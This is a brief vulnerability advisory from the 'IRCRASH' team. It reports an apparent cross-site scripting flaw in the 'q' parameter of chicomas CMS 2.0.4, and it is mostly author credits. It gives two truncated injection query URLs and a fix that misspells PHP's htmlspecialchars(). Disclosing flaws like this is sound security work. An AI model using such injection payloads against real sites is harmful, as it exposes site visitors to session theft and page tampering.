Author : Hadi Kiamarsi ---------------------------------------------------------------------------------- Discovered by : Hadi Kiamarsi ---------------------------------------------------------------------------------- Exploited By : Hadi Kiamarsi ---------------------------------------------------------------------------------- E-Mail : hadikiamarsi[at]hotmail.com ---------------------------------------------------------------------------------- WebSite : http://ircrash.com ---------------------------------------------------------------------------------- Our Team : ircrash ---------------------------------------------------------------------------------- IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ---------------------------------------------------------------------------------- CMS: chicomas.2.0.4 Download CMS : http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip ---------------------------------------------------------------------------------- Exploit : Method = POST query : http://www.example.com/[chicomas]/index.php?q=>"> query : http://www.example.com/[chicomas]/index.php?q="> ----------------------------------------------------------------------------------- Solution : you must filter special character in input via htmlspecialchar() function -----------------------------------------------------------------------------------